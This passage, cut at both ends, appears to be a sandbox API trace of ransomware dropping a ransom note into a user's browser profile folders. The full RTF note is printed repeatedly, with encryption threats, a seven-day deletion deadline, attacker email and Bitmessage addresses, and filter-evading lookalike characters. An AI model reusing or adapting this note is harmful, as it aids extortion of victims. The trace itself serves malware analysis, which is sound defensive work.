which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.842] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0284.842] WriteFile (in: hFile=0x2ec, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.843] CloseHandle (hObject=0x2ec) returned 1 [0284.843] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\#readme_eman#.rtf")) returned 0xffffffff [0284.843] GetLastError () returned 0x2 [0284.843] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0284.843] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 